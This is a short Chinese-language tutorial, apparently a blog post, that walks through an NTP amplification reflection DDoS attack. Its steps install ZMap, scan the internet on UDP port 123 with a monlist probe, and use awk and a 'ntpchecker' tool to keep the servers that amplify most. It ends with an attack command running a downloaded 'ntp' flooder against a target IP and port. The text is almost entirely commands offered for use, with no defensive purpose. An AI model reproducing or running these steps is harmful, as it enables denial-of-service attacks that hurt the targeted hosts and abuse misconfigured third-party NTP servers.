1. 程式人生 > >NTP放大反射攻擊掃描列表教程

NTP放大反射攻擊掃描列表教程

1.升級所有包,改變軟體設定和系統設定,系統版本核心都升級

yum -y update

2.下載rpm包(區分centos6 與centos7 執行不同的命令)

centos6:
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
centos7:
wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/epel-release-7-11.noarch.rpm
sudo rpm -Uvh epel-release-7-11.noarch.rpm

3.安裝必要的依賴環境

yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c

--------------------------------------------掃描過濾列表-----------------------------------------------

4.安裝Zmap

wget https://
github.com/zmap/zmap/archive/v1.0.3.tar.gz tar -zxvf v1.0.3.tar.gz cd /root/zmap-1.0.3 cd src/ make make install

ZMap安裝完成,可以執行如下命令測試:

zmap -p 80 -N 10 -B 1M -o -   #很快,程式會輸出10個Internet上打開了80埠的主機的IP,你也可以換成22埠23埠試試。具體的用法可以參考ZMap官方文件。

5.開始掃描NTP放大列表

screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
如果在掃描時,你與伺服器的會話不小心中斷。
你可以重新連線伺服器。
使用命令screen 
-r回到會話。 screen是將程式獨立執行在後臺,直到執行完成。

6.過濾列表

chmod 777 ntpchecker #新增許可權

screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1 #執行檢查

awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt #過濾列表

--------------------------------------------放大攻擊-----------------------------------------------

工具下載至本文:https://www.cnblogs.com/a1d4m/p/10051969.html

7.攻擊命令

chmod 777 ntp #賦予許可權
./ntp 127.0.0.1 80 ntpamp.txt 100 -1 100